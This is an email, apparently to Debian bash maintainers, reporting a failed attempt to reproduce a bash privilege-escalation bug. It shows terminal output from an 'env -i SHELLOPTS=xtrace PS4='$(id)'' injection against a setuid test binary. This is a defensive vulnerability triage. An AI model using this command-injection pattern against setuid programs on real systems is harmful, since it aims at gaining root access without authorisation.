Hi Matthias and Balint
I have tried to reproduce the problem described in the openwall email. However I can not reproduce it. Have you been able to?
On wheezy:
------------
ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 20:54:07 UTC 2016
ola@tigereye:/$ ls -la test
-rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
ola@tigereye:/$ dpkg -l bash
...CUT...
ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
On jessie:
ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 22:48:35 CEST 2016
ola@tigereye:~/exploit$ dpkg -l bash
...CUT...
ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
I think it may be because SHELLOPTS is a read-only variable.
ola@tigereye:~/exploit$ SHELLOPTS=xtrace
bash: SHELLOPTS: readonly variable
Do you think I have made a mistake in the reproduction or is it so that the patch was actually not on a real problem (at least in Debian).
Not even if I change the code like this:
ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0); system("/bin/bash -c /bin/date"); }'
ola@tigereye:~/exploit$ ./test2
Thu Oct 6 23:04:11 CEST 2016
ola@tigereye:~/exploit$ set -x
ola@tigereye:~/exploit$ ./test2
uid=1000(ola) gid=1000(ola) groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
Thu Oct 6 23:04:18 CEST 2016
My conclusion is that there is no security hole. But I may be mistaken.
Can anyone else reproduce the issue?
Best regards,
// Ola